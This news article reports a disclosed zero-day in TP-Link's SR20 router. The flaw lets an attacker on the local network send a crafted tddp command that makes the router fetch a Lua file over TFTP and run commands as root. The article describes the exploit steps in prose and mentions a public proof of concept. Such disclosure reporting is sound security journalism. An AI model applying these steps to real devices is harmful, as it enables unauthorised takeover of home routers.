TP-Link’s SR20 Smart Home Router is impacted by a zero-day arbitrary code execution (ACE) vulnerability which allows potential attackers on the same network to execute arbitrary commands as disclosed on Twitter by Google security developer Matthew Garrett.
Garrett disclosed the ACE 0-day after TP-Link did not provide a response during the 90 days since his report and, as he explained in the Twitter thread, the zero-day stems from the fact that “TP-Link routers frequently run a process called “tddp” (TP-Link Device Debug Protocol) as root” which has been previously found to contain multiple other vulnerabilities [1, 2].
TDDP allows running two types of commands on the device: type 1 which do not require authentication and type 2 which ask for administrator credentials.
It’s been over 90 days since I reported it and @TPLINK never responded, so: arbitrary command execution on the TP-Link SR20 smart hub and router (and possibly other TP-Link device)
— Matthew Garrett (@mjg59) March 28, 2019
Zero-day allows attackers to execute arbitrary code as root
As detailed by Garret, the vulnerable router exposes a number of type 1 commands, with one of them—command 0x1f, request 0x01—”appears to be for some sort of configuration validation,” allowing would-be attackers to send a command containing a filename, a semicolon, and an argument to initiate the exploitation process.
This will instruct the TP-Link router to the machine sending the specially crafted request over Trivial File Transfer Protocol (TFTP). Once connected to the potential attacker’s machine, the SR20 smart hub “requests the filename via TFTP, imports it into a LUA interpreter and passes the argument to the config_test() function in the file it just imported. The interpreter is running as root.”
Next, the os.execute() method will allow unauthenticated attackers to execute any command they want as root, leading to a full take over of any compromised TP-Link SR20 devices.
Proof-of-concept also available
While the tddp daemon is designed to listen on all interfaces to all incoming traffic, the default firewall rules SR20 routers come with will block attackers from exploiting the zero-day vulnerability from outside the local area network (LAN) the device is part of.
Garret concludes by saying that TP-Link should “stop shipping debug daemons on production firmware and if you’re going to have a webform to submit security issues then have someone actually respond to it.”
The Google developer also created a proof-of-concept (PoC) which also got publicly shared at the time the zero-day was disclosed.
The last firmware update issued for the SR20 Smart Home Router is from June 2018 and it removed WPS from the router’s WEB UI, fixed bugs on some Smart Actions, and added support for a number of TP-Link Smart Wifi devices.
BleepingComputer has reached out to TP-Link for more details but did not receive an answer prior to publication.